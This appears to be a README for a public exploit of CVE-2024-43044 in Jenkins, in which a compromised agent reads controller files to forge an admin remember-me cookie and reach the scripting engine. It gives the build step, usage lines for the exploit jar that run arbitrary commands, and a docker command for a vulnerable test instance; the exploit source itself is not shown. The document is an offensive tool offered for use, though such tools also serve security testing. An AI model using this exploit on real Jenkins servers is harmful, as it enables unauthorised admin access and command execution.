This is an exploit for CVE-2024-43044, an arbitrary file read that allows an agent to fetch files from the controller.
The exploit will use the vulnerability to read files to forge a remember-me cookie for an admin account and gain access to Jenkins scripting engine.
Check out the full writeup at
mvn package
Exploit Usages:
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>
java -jar exploit.jar mode_attach <jenkinsUrl> <cmd>
java -jar exploit.jar mode_attach <cmd>
You can test it in vulnerable version using docker:
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17
Once you have a jenkins runnning, setup an agent.
The controller/agent connection can be either default (using url, nodename, secret) or via SSH.